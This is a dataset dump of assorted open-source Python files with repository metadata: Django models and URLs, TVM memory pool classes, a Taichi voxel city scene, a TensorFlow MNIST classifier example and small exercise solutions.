blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
790f67a27f41c7f4456c418cf0e03464a2005369 | e4ee9f2ca60b60ea9fa1b05c982594a2c1b10484 | /day61 课上笔记以及代码 django orm跨表查询/代码/manytable/app01/models.py | 17295b515cdc4aa9e96bd4ea8605780ea96f0da5 | [] | no_license | tianshang486/Pythonlaonanhai | 100df2cc437aad1ee1baf45bdfc4500b1302092b | 2a5b46986f5ca684b2ae350596e293db54e1e2f4 | refs/heads/master | 2022-09-19T02:16:56.972160 | 2020-06-04T09:24:30 | 2020-06-04T09:24:30 | 269,314,860 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | from django.db import models
# Create your models here.
from django.db import models
# Create your models here.
#作者表
class Author(models.Model): #比较常用的信息放到这个表里面
name=models.CharField( max_length=32)
age=models.IntegerField()
# authorDetail=models.OneToOneField(to="AuthorDetail",to_field="nid",on_delete=models.CASCADE)
authorDetail=models.OneToOneField(to='AuthorDetail') #一对一到AuthorDetail表 生成为表字段之后,会自动变为authorDetail_id这样有一个名称
# 外键字段 -- 外键字段名_id
# foreign+unique
def __str__(self):
return self.name
#作者详细信息表
class AuthorDetail(models.Model):
birthday=models.DateField()
# telephone=models.BigIntegerField()
telephone=models.CharField(max_length=32)
addr=models.CharField( max_length=64)
def __str__(self):
return self.addr
#出版社表 和 书籍表 是 一对多的关系
class Publish(models.Model):
name=models.CharField( max_length=32)
city=models.CharField( max_length=32)
email=models.EmailField() #charfield -- asdfasdf
def __str__(self):
return self.name
#书籍表
class Book(models.Model):
nid = models.AutoField(primary_key=True)
title = models.CharField( max_length=32)
publishDate=models.DateField()
price=models.DecimalField(max_digits=5,decimal_places=2) #decimal(16,2)
publishs=models.ForeignKey(to="Publish",related_name='xx')
authors=models.ManyToManyField(to='Author')
def __str__(self):
return self.title
# class BookToAuthor(models.Model):
# book_id = models.ForeignKey(to='Book')
# author_id = models.ForeignKey(to='Author')
# # xx = models.CharField(max_length=12)
| [
"tianshang486@.com"
] | tianshang486@.com |
fd4fd9e65dc6ee6914dcc793301d1b035fea57b1 | 3da6b8a0c049a403374e787149d9523012a1f0fc | /Coder_Old/早期代码/test6.py | 73386cf5c9237f095c66d194c9e0dbf3b2a33fb8 | [] | no_license | AndersonHJB/PyCharm_Coder | d65250d943e84b523f022f65ef74b13e7c5bc348 | 32f2866f68cc3a391795247d6aba69a7156e6196 | refs/heads/master | 2022-07-25T11:43:58.057376 | 2021-08-03T02:50:01 | 2021-08-03T02:50:01 | 348,922,058 | 3 | 3 | null | 2021-09-05T02:20:10 | 2021-03-18T02:57:16 | Python | UTF-8 | Python | false | false | 363 | py | user_answer_correct = False #False
while not user_answer_correct: #True
user_gender = input("请输入你的性别(F/M):")
if user_gender == 'F':
print("你是萌妹子!")
user_answer_correct = True
elif user_gender == 'M':
print("你是糙汉子!")
user_answer_correct = True
else:
print("输入不正确,请输入'F'或'M'")
| [
"1432803776@qq.com"
] | 1432803776@qq.com |
79f773c3ae16399c5f62a3cf1fb0ce58800a4bfe | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_7/gdljam001/question1.py | 82f4d81b71c8d1fa705a32a941e2345642497547 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | """Enter strings delete duplicates print
James Godlonton
29 April 2014"""
def main():#Main function get input of strings and print unique ones
print("Enter strings (end with DONE):\n")
count=0
words=[]#array is used to keep order
newWord=input("")#get first string
#append to array
while(newWord!="DONE"):#while "DONE" sentinal not entered get new word
if newWord not in words:#if new word not done and not already in the words array add it to array
words.append(newWord)
newWord=input("")
print("Unique list:")
for wrd in words:#Cycle through array printing words in correct order
print(wrd)
if __name__=="__main__":#Running main
main() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
89407569d51f23f7788a8c25ad587b13bfa7d953 | 68a52ad1df836c9f6d922515b2f896b6928ce6a0 | /SafetyProductionSystem/systemsettings/migrations/0003_auto_20190225_1623.py | 899014ddee8e156d68343a14982871a4e35b7333 | [] | no_license | Chuazhen0/SafetyProductionSystem | 1141f845e04b032ff2a230c8def26066f061600c | 442d5df3818d43aebb9830f2456c73018aae2acf | refs/heads/master | 2020-05-20T12:47:46.365020 | 2019-05-08T09:56:01 | 2019-05-08T09:56:01 | 185,579,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | # Generated by Django 2.0.5 on 2019-02-25 16:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('systemsettings', '0002_supervisiontype_form_use'),
]
operations = [
migrations.AddField(
model_name='kks',
name='KKs_organid',
field=models.CharField(blank=True, default='', max_length=30, null=True, verbose_name='KKS电厂接口id'),
),
migrations.AlterField(
model_name='kks',
name='KKS_code',
field=models.CharField(blank=True, default='', max_length=30, null=True, verbose_name='KKS编码'),
),
migrations.AlterField(
model_name='kks',
name='KKS_codename',
field=models.TextField(blank=True, default='', null=True, verbose_name='KKS编码名称'),
),
]
| [
"Caohuazhenrn@163.com"
] | Caohuazhenrn@163.com |
8e718c6efb993cb859b4413f341342e7098c2c60 | 01062df369907a6ff4367ad006d9be75f3b0886f | /zvt/recorders/eastmoney/dividend_financing/__init__.py | 49e6bf4757df6edae05a9e784d6be28b8a1da5cc | [
"MIT"
] | permissive | scanfyu/zvt | 917d8dd6df63fd3d55183896710573700f615a0e | 2ff38155bd85fb0945a7b45cad8dbdf2f175a3d5 | refs/heads/master | 2021-12-01T13:40:00.241766 | 2021-11-26T16:04:04 | 2021-11-26T16:04:04 | 186,553,012 | 0 | 0 | MIT | 2020-03-01T02:33:08 | 2019-05-14T05:46:40 | Python | UTF-8 | Python | false | false | 1,256 | py | # -*- coding: utf-8 -*-
# the __all__ is generated
__all__ = []
# __init__.py structure:
# common code of the package
# export interface in __all__ which contains __all__ of its sub modules
# import all from submodule eastmoney_dividend_detail_recorder
from .eastmoney_dividend_detail_recorder import *
from .eastmoney_dividend_detail_recorder import __all__ as _eastmoney_dividend_detail_recorder_all
__all__ += _eastmoney_dividend_detail_recorder_all
# import all from submodule eastmoney_dividend_financing_recorder
from .eastmoney_dividend_financing_recorder import *
from .eastmoney_dividend_financing_recorder import __all__ as _eastmoney_dividend_financing_recorder_all
__all__ += _eastmoney_dividend_financing_recorder_all
# import all from submodule eastmoney_rights_issue_detail_recorder
from .eastmoney_rights_issue_detail_recorder import *
from .eastmoney_rights_issue_detail_recorder import __all__ as _eastmoney_rights_issue_detail_recorder_all
__all__ += _eastmoney_rights_issue_detail_recorder_all
# import all from submodule eastmoney_spo_detail_recorder
from .eastmoney_spo_detail_recorder import *
from .eastmoney_spo_detail_recorder import __all__ as _eastmoney_spo_detail_recorder_all
__all__ += _eastmoney_spo_detail_recorder_all | [
"5533061@qq.com"
] | 5533061@qq.com |
c8495695dfc3158a39b3fd5002042159feee657f | 74b12c96a73d464e3ca3241ae83a0b6fe984b913 | /python/tvm/ir/memory_pools.py | 6fa6bb41280ee5b88cdca8431f31b4201bd621c5 | [
"Apache-2.0",
"BSD-3-Clause",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | masahi/tvm | cf765bb892655f02135e1ce3afde88698f026483 | c400f7e871214451b75f20f4879992becfe5e3a4 | refs/heads/master | 2023-08-22T20:46:25.795382 | 2022-04-13T08:47:10 | 2022-04-13T08:47:10 | 138,661,036 | 4 | 2 | Apache-2.0 | 2021-09-03T20:35:19 | 2018-06-25T23:39:51 | Python | UTF-8 | Python | false | false | 4,811 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Objects for Memory Pools to be used within the compilation"""
from typing import Optional, List
from tvm._ffi import register_object
from tvm.runtime import Object
from . import _ffi_api
@register_object("ir.PoolInfo")
class PoolInfo(Object):
"""PoolInfo object holds information related to memory pools
where the statically sized allocate nodes will pooled into.
Parameters
----------
pool_name : str
The name of the memory pool
target_access : Dict[Target, str]
A dictionary where keys describe which targets could
access the pool where value could take the values :
a) "rw" : read-write access
b) "ro" : write-only acesss
size_hint_bytes : Optional[int]
The expected size hint to be used by the allocator.
The default value would be -1 which means the pool
is not size restricted.
clock_frequency_hz : Optional[int]
The clock frequency that the memory pool runs at in Hz.
If not specified/known, this will default to -1 indicating
it hasn't been defined.
read_bandwidth_bytes_per_cycle : Optional[int]
The read bandwidth of the memory pool in bytes/cycle.
If not specified/known, this will default to -1 indicating
it hasn't been defined.
write_bandwidth_bytes_per_cycle : Optional[int]
The write bandwidth of the memory pool in bytes/cycle.
If not specified/known, this will default to -1 indicating
it hasn't been defined.
read_latency_cycles : Optional[int]
The read latency of the memory pool in cycles.
If not specified/known, this will default to 0.
write_latency_cycles : Optional[int]
The write latency of the memory pool in cycles.
If not specified/known, this will default to 0.
target_burst_bytes : Optional[Union[Dict[Target, int], None]]
The burst length of the memory pool in bytes per target.
If not specified/known for a given target, a burst length
of 1 byte will be assumed.
"""
# The string parameter to indicate read and write access to a pool
# This needs to be kept in sync with kTargetPoolReadWriteAccess in
# include/tvm/ir/memory_pools.h
READ_WRITE_ACCESS = "rw"
# The string parameter to indicate read only access to a pool
# This needs to be kept in sync with kTargetPoolReadOnlyAccess in
# include/tvm/ir/memory_pools.h
READ_ONLY_ACCESS = "ro"
def __init__(
self,
pool_name: str,
target_access, # Dict[Target, str]
size_hint_bytes: Optional[int] = -1,
clock_frequency_hz: Optional[int] = -1,
read_bandwidth_bytes_per_cycle: Optional[int] = -1,
write_bandwidth_bytes_per_cycle: Optional[int] = -1,
read_latency_cycles: Optional[int] = 0,
write_latency_cycles: Optional[int] = 0,
target_burst_bytes=None, # Optional[Union[Dict[target.Target, int], None]]
):
if not target_burst_bytes:
target_burst_bytes = dict()
self.__init_handle_by_constructor__(
_ffi_api.PoolInfo, # type: ignore # pylint: disable=no-member
pool_name,
target_access,
size_hint_bytes,
clock_frequency_hz,
read_bandwidth_bytes_per_cycle,
write_bandwidth_bytes_per_cycle,
read_latency_cycles,
write_latency_cycles,
target_burst_bytes,
)
@register_object("ir.WorkspaceMemoryPools")
class WorkspaceMemoryPools(Object):
"""This object contains a list of PoolInfo objects to be used as
workspace memory in the compilation
Parameters
----------
pools : List[PoolInfo]
The list of PoolInfo objects to be used with the compilation
"""
def __init__(
self,
pools: List[PoolInfo],
):
self.__init_handle_by_constructor__(
_ffi_api.WorkspaceMemoryPools, pools # type: ignore # pylint: disable=no-member
)
| [
"noreply@github.com"
] | masahi.noreply@github.com |
272841adc8391f599019c7c4e827f9a9d32e39c6 | bb5d587afdf7fb455972889b1453b48371b55c25 | /my_projects/social_project/social_profile/urls.py | 5ae5e9d4a2bf24fbbd6c72a76988e482e20487cd | [] | no_license | nilldiggonto/projects_dj3_vue3_js | e8a98019c1e5ec65724c09733054afbacfb22ead | 6ce52c29c3560a25ed36ba074fc6c2a60191ebe4 | refs/heads/main | 2023-05-30T06:00:06.558789 | 2021-05-29T10:06:02 | 2021-05-29T10:06:02 | 342,195,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | from django.urls import path
from .views import socialprofileView,follow_userView,unfollow_userView,followerView,followView,edit_avatarView
urlpatterns = [
path('avatar/',edit_avatarView,name='social-edit-avatar'),
path('<str:username>',socialprofileView,name='social-profile'),
path('<str:username>/follow/',follow_userView,name='social-user-profile-follow'),
path('<str:username>/unfollow/',unfollow_userView,name='social-user-profile-unfollow'),
path('<str:username>/follower/list/',followerView,name='social-follower-list'),
path('<str:username>/follows/list/',followView,name='social-follow-list'),
] | [
"nilldiggonto@gmail.com"
] | nilldiggonto@gmail.com |
668ee56d3db6869a5a34ef2f597168e88eb72fe4 | 337522cddf5931972932a870e24905567889a49f | /example7.py | e772a6cd235c28c6f95c89d68e7929327932a8dd | [] | no_license | taichi-dev/voxel-challenge | 3d7552d7029328e9c28e2665c06e1b23a15bcc30 | 94c28c8c37d6ff1547daf47becf9731be41dc2e5 | refs/heads/main | 2023-07-10T06:59:02.694455 | 2022-08-04T03:06:53 | 2022-08-04T03:06:53 | 481,891,435 | 186 | 45 | null | 2022-08-05T16:09:43 | 2022-04-15T08:29:35 | Python | UTF-8 | Python | false | false | 5,837 | py | from scene import Scene; import taichi as ti; from taichi.math import *
day = True; manual_seed = 77
scene = Scene(voxel_edges=0, exposure=2 - day)
scene.set_floor(-0.05, (1.0, 1.0, 1.0))
scene.set_background_color((0.9, 0.98, 1) if day else (0.01, 0.01, 0.02))
scene.set_directional_light((1, 1, 1), 0.1, (0.9, 0.98, 1) if day else (0.01, 0.01, 0.02))
lgrid, ngrid = 15, 8
@ti.func
def rand(i, j): return fract(ti.sin(dot(vec2(i, j), vec2(12.9898, 78.233))) * 43758.5453)
@ti.func
def is_road(i, j):
return 0 <= i < ngrid and 0 <= j <= ngrid and scene.get_voxel(vec3(i, -8, j))[0] == 1
@ti.kernel
def initialize():
for i, j in ti.ndrange(8, 8): scene.set_voxel(ivec3(i, -8, j), 0, vec3(0))
start, end = 1+int(vec2(ti.random(),ti.random())*(ngrid-2)), 1+int(vec2(ti.random(),ti.random())*(ngrid-2))
turn = start + 1
while any((abs(turn-start)==1)|(abs(turn-end)==1)): turn = 1+int(vec2(ti.random(),ti.random())*(ngrid-2))
for k in ti.static([0, 1]):
d = vec2(k, 1-k); p = start[k]*vec2(1-k, k)-d
while p[1-k] < ngrid - 1:
p += d; scene.set_voxel(ivec3(p.x, -8, p.y), 1, vec3(0.5))
if p[1-k] == turn[1-k]: d = (1 if start[k] < end[k] else -1) * vec2(1-k, k)
if p[k] == end[k]: d = vec2(k, 1-k)
@ti.func
def build_road(X, uv, d):
if d.sum() <= 2:
if ((d.x | d.z) ^ (d.y | d.w)) & 1: uv = vec2(uv.y, uv.x) if (d.y | d.w) & 1 else uv
else: # curve
while d.z == 0 or d.w == 0: d = d.yzwx; uv=vec2(14-uv.y, uv.x)
uv = vec2(uv.norm(), ti.atan2(uv.x, uv.y)*2/pi*lgrid)
elif d.sum() >= 3: # junction
while d.sum() == 3 and d.y != 0: d = d.yzwx; uv=vec2(14-uv.y, uv.x) # rotate T-junction
if d.sum() > 3 or uv.x <= 7:
uv = vec2(mix(14-uv.x, uv.x, uv.x <= 7), mix(14-uv.y, uv.y, uv.y <= 7))
uv = vec2(uv.norm(), ti.atan2(uv.x, uv.y)*2/pi*lgrid)
scene.set_voxel(vec3(X.x, 0, X.y), 1, vec3(1 if uv.x==7 and 4<uv.y<12 else 0.5)) # pavement
if uv.x <= 1 or uv.x >= 13: scene.set_voxel(ivec3(X.x, 1, X.y), 1, vec3(0.7, 0.65, 0.6)) # sidewalk
if uv.y == 7 and (uv.x == 1 or uv.x == 13): # lights
for i in range(2, 9): scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.6, 0.6, 0.6))
if uv.y == 7 and (1<=uv.x<=2 or 12<=uv.x<=13): scene.set_voxel(vec3(X.x, 8, X.y), 1, vec3(0.6, 0.6, 0.6))
if uv.y == 7 and (uv.x == 2 or uv.x == 12): scene.set_voxel(vec3(X.x, 7, X.y), 2, vec3(1, 1, 0.6))
@ti.func
def build_building(X, uv, d, r):
while d.sum() > 0 and d.z == 0: d = d.yzwx; uv=vec2(14-uv.y, uv.x) # rotate
fl = int(3 + 10 * r); style = rand(r, 5)
wall = vec3(rand(r, 1),rand(r, 2),rand(r, 2)) * 0.2+0.4
wall2 = mix(vec3(rand(r, 9)*0.2+0.2), wall, style > 0.5 and rand(r, 4) < 0.4)
maxdist = max(abs(uv.x - 7), abs(uv.y - 7))
for i in range(2, fl * 4):
light = mix(vec3(0.25,0.35,0.38), vec3(0.7,0.7,0.6), rand(rand(X.x, X.y), i//2)>0.6)
if maxdist < 6:
scene.set_voxel(vec3(X.x, i, X.y), mix(1, 0, i%4<2), mix(wall2, light, i%4<2))
if (uv.x == 2 or uv.x == 12) and (uv.y == 2 or uv.y == 12) or style>0.5 and (uv.x%3==1 or uv.y%3==1):
scene.set_voxel(vec3(X.x, i, X.y), 1, wall)
if maxdist < 5: scene.set_voxel(vec3(X.x, i, X.y), mix(1, 2, i%4<2), mix(wall, light, i%4<2))
if maxdist == 5:
for i in range(fl*4, fl*4+2): scene.set_voxel(vec3(X.x, i, X.y), 1, wall) # roof
if maxdist < 5: scene.set_voxel(vec3(X.x, fl*4, X.y), 1, vec3(rand(r, 7)*0.2+0.4))
for i in range(2): scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.7, 0.65, 0.6)) # sidewalk
if fl > 10 and uv.x == 6 and uv.y == 6: # antenna
for i in range(fl+1):
scene.set_voxel(vec3(X.x, fl*5-i, X.y), mix(1, 2, i==0), mix(vec3(0.6), vec3(0.8,0,0), i==0))
if d.sum() > 0 and uv.y == 2 and 4 < uv.x < 10: # billboard
for i in range(5, 7):
scene.set_voxel(vec3(X.x,i,X.y), 2, vec3(int(r*3)==0,int(r*3)==1,int(r*3)==2)*(0.2+ti.random()*0.3))
for i in range(2, 5): scene.set_voxel(vec3(X.x,i,X.y), 0, vec3(0))
if d.sum() > 0 and uv.y == 3 and 4 < uv.x < 10:
for i in range(2, 5): scene.set_voxel(vec3(X.x,i,X.y), 1, vec3(0.7,0.7,0.6))
if max(abs(uv.x - rand(r, 8)*7-4), abs(uv.y - rand(r, 10)*7-4)) < 1.5: # HVAC
for i in range(fl*4+1, fl*4+3): scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.6))
@ti.func
def build_park(X, uv, d, r):
center, height = int(vec2(rand(r, 1) * 7 + 4, rand(r, 2) * 7 + 4)), 9 + int(rand(r, 3)) * 5
for i in range(height + 3): # tree
if (uv - center).norm() < 1:
scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.36, 0.18, 0.06))
if i > min(height-4, (height+5)//2) and (uv - center).norm() < (height+3-i) * (rand(r, 4)*0.6 + 0.4):
scene.set_voxel(vec3(X.x, i, X.y), ti.random()<0.8, vec3(0.1, 0.3 + ti.random()*0.2, 0.1))
h = 2 * ti.sin((uv.x**2+uv.y**2+rand(r, 0)**2*256)/1024 * 2*pi) + 2 + (ti.random() > 0.95)
for i in range(int(h)): # grass
scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.2, 0.5 + ti.random() * 0.2, 0.05))
if max(abs(uv.x - rand(r, 4)*7-4), abs(uv.y - rand(r, 5)*7-4)) < 0.5: # light
for i in range(3):
scene.set_voxel(vec3(X.x, h+i, X.y), 1+(i==1), mix(vec3(0.2),vec3(0.9,0.8,0.6),vec3(i==1)))
@ti.kernel
def draw():
for X in ti.grouped(ti.ndrange((-60, 60), (-60, 60))):
I, uv = (X+60) // lgrid, float((X + 60) % lgrid)
d = int(vec4(is_road(I.x,I.y+1),is_road(I.x+1,I.y),is_road(I.x,I.y-1),is_road(I.x-1,I.y)))
r = mix(rand(I.x, I.y), any(d>0), 0.4)
if is_road(I.x, I.y): build_road(X, uv, d)
elif r > 0.5: build_building(X, uv, d, 2*r-1)
else: build_park(X, uv, d, 2*r)
[initialize() for _ in range(manual_seed + 1)]; draw(); scene.finish()
| [
"noreply@github.com"
] | taichi-dev.noreply@github.com |
e15565680e10de69563972677f3682cd3d1140ce | aff608f59d1c9ecee2ebca0ac63e0e1775502858 | /sitegeist/cache.py | 0244a7db751c7415809f9af64171871519dea17c | [] | permissive | parthkhatri1998/sitegeist | 45a5010dad09fabd98be59a9fd0dc18289749ba7 | 231b18dfb3a5a0fce32c1c5e01227dcf9bb18010 | refs/heads/master | 2022-12-23T01:37:37.721753 | 2020-09-30T16:26:15 | 2020-09-30T16:26:15 | 299,981,485 | 0 | 0 | BSD-3-Clause | 2020-09-30T16:25:45 | 2020-09-30T16:25:45 | null | UTF-8 | Python | false | false | 1,509 | py | import datetime
import logging
from django.conf import settings
from sitegeist.mongo import db
logger = logging.getLogger(__name__)
class CoordinateCache(object):
def __init__(self, namespace, snap_radius=None):
self.namespace = namespace
self.snap_radius = snap_radius or settings.SITEGEIST['GEO_SNAP_RADIUS']
def get(self, latlon):
if not settings.SITEGEIST.get('COORDCACHE', False):
return
latlon = [float(p) for p in latlon]
spec = {
"namespace": self.namespace,
"geo": {
"$maxDistance": self.snap_radius,
"$near": latlon
}
}
doc = db.coordcache.find_one(spec)
if doc:
now = datetime.datetime.utcnow()
expsecs = settings.SITEGEIST['COORDCACHE_EXPIRATION'] * 60
exptime = doc['timestamp'] + datetime.timedelta(seconds=expsecs)
logger.debug("Comparing cache expiration %s to now %s" % (exptime, now))
if exptime > now:
logger.debug("Cache is valid")
return doc['data']
else:
logger.debug("Cache is invalid, deleting document")
db.coordcache.remove(doc["_id"])
def set(self, latlon, data):
doc = {
'geo': latlon,
'namespace': self.namespace,
'data': data,
'timestamp': datetime.datetime.utcnow(),
}
db.coordcache.insert(doc)
| [
"jcarbaugh@gmail.com"
] | jcarbaugh@gmail.com |
dc14a031d4b4835a5f528eaa2f8bc1d6d6d739ac | dd027c4bbcace97e3dbf566c123b178ceb1a8282 | /sett/jenkins.py | e001b1bf4d4e59dbd5a8ad9a75c21044fbe740be | [] | no_license | cecedille1/Sett | 479bf00ca8df807f431e235c68b892bb90fab9b0 | bf8b9f204caa532a5fb8f110ab4e4a1cea03cb96 | refs/heads/master | 2021-01-10T13:28:11.614022 | 2016-03-31T16:51:14 | 2016-03-31T16:51:14 | 43,488,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from paver.easy import task, call_task
@task
def jenkins():
"""Runs the Jenkins tasks"""
# Generate nosetest.xml
# Generate coverage.xml
# Generate flake8.log
try:
call_task('quality', options={
'output': 'flake8.log',
'strictness': 2,
})
except SystemExit:
quality_ok = False
else:
quality_ok = True
call_task('coverage', options={
'xunit': 'nosetests.xml',
'xcoverage': 'coverage.xml',
})
if not quality_ok:
raise SystemExit(1)
| [
"gr@enix.org"
] | gr@enix.org |
f6a4e829c58c1e15e58c94bdee01590ada2c674c | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_228/ch167_2020_06_22_18_23_48_389416.py | 3422198732d84d06c9a9ad4b22dcf97ec1c7fdeb | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | def bairro_mais_custoso(empresa):
semestral={}
for bairro in empresa:
semestral[bairro]=0
for gasto in empresa[bairro][6:]:
semestral[bairro]+=gasto
maiorcusto=0
nome=""
for bairro,custo in semestral.items():
if custo>maiorcusto:
maiorcusto=custo
nome=bairro
return nome
| [
"you@example.com"
] | you@example.com |
3ade7e133fc24950c2902b71a88de65edfd42d9e | 1ba8d8ae275524a2ac61226dca4a21972cf6c355 | /Deep_Learning_with_TensorFlow/1.4.0/Chapter10/8. Estimator-DNNClassifier.py | 0355ab5fda86fa6dc0e3bc53a476c1c09fb64d08 | [
"MIT"
] | permissive | hyphenliu/TensorFlow_Google_Practice | 4e2da546f6056ddbbda26a2d9855cc96c2e3a708 | 0ea7d52a4056e5e53391a452a9bbd468175af7f5 | refs/heads/master | 2020-09-28T17:13:05.032238 | 2018-07-18T08:07:34 | 2018-07-18T08:07:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,444 | py |
# coding: utf-8
# ### 1. 模型定义。
# In[1]:
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
tf.logging.set_verbosity(tf.logging.INFO)
mnist = input_data.read_data_sets("../../datasets/MNIST_data", one_hot=False)
# 定义模型的输入。
feature_columns = [tf.feature_column.numeric_column("image", shape=[784])]
# 通过DNNClassifier定义模型。
estimator = tf.estimator.DNNClassifier(feature_columns=feature_columns,
hidden_units=[500],
n_classes=10,
optimizer=tf.train.AdamOptimizer(),
model_dir="log")
# ### 2. 训练模型。
# In[2]:
train_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"image": mnist.train.images},
y=mnist.train.labels.astype(np.int32),
num_epochs=None,
batch_size=128,
shuffle=True)
estimator.train(input_fn=train_input_fn, steps=10000)
# ### 3. 测试模型。
# In[3]:
test_input_fn = tf.estimator.inputs.numpy_input_fn(
x={"image": mnist.test.images},
y=mnist.test.labels.astype(np.int32),
num_epochs=1,
batch_size=128,
shuffle=False)
test_results = estimator.evaluate(input_fn=test_input_fn)
accuracy_score = test_results["accuracy"]
print("\nTest accuracy: %g %%" % (accuracy_score*100))
print test_results
| [
"1786546913@qq.com"
] | 1786546913@qq.com |
2252aa44817b2d07ab6ed5d0ee6a3517d72f807c | aa7de5b75b65404715676121d61a9b06348d5f62 | /telemetry/telemetry/internal/platform/device_finder.py | 4547ecd20747c41e9da726a41ddad68480306fba | [
"BSD-3-Clause"
] | permissive | benschmaus/catapult | 3ca2ede51e4a23082e634fa07a03c11158bd6d9a | f388b1f6b90c670b6524fd68a295bae26ba8db70 | refs/heads/master | 2021-01-20T07:53:45.431708 | 2017-07-17T18:03:09 | 2017-07-17T18:03:09 | 90,060,605 | 0 | 1 | null | 2017-05-02T17:38:42 | 2017-05-02T17:38:41 | null | UTF-8 | Python | false | false | 1,304 | py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Finds devices that can be controlled by telemetry."""
from telemetry.internal.platform import android_device
from telemetry.internal.platform import cros_device
from telemetry.internal.platform import desktop_device
DEVICES = [
android_device,
cros_device,
desktop_device,
]
def _GetAllAvailableDevices(options):
"""Returns a list of all available devices."""
devices = []
for device in DEVICES:
devices.extend(device.FindAllAvailableDevices(options))
return devices
def GetDevicesMatchingOptions(options):
"""Returns a list of devices matching the options."""
devices = []
remote_platform_options = options.remote_platform_options
if (not remote_platform_options.device or
remote_platform_options.device == 'list'):
devices = _GetAllAvailableDevices(options)
elif remote_platform_options.device == 'android':
devices = android_device.FindAllAvailableDevices(options)
else:
devices = _GetAllAvailableDevices(options)
devices = [d for d in devices if d.guid ==
options.remote_platform_options.device]
devices.sort(key=lambda device: device.name)
return devices
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org |
d9d3518697740e62f5fcd78a2d44d8952a390926 | e976eb4db57ddee4947cbab8746446dd53f6cf6f | /101-150/三角形最小路径和.py | ec3af7dda958d297f2e463e0f3c2c521d4e43907 | [] | no_license | Aiyane/aiyane-LeetCode | 5328529079bcfbc84f4e4d67e3d8736b9745dc0d | 3c4d5aacc33f3ed66b6294894a767862170fb4f6 | refs/heads/master | 2020-04-01T20:33:54.125654 | 2019-06-25T09:56:10 | 2019-06-25T09:56:10 | 153,610,015 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 905 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 三角形最小路径和.py
"""
给定一个三角形,找出自顶向下的最小路径和。每一步只能移动到下一行中相邻的结点上。
例如,给定三角形:
[
[2],
[3,4],
[6,5,7],
[4,1,8,3]
]
自顶向下的最小路径和为 11(即,2 + 3 + 5 + 1 = 11)。
说明:
如果你可以只使用 O(n) 的额外空间(n 为三角形的总行数)来解决这个问题,那么你的算法会很加分。
"""
__author__ = 'Aiyane'
class Solution(object):
def minimumTotal(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
if not triangle: return 0
vals = [v for v in triangle[-1]]
for line in triangle[:-1][::-1]:
for i, v in enumerate(line):
vals[i] = v + min(vals[i], vals[i+1])
return vals[0]
| [
"2310091880qq@gmail.com"
] | 2310091880qq@gmail.com |
